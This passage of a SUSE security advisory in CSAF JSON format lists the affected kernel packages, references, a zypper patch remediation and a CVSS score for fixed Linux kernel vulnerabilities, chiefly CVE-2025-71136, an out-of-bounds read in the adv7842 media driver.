"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
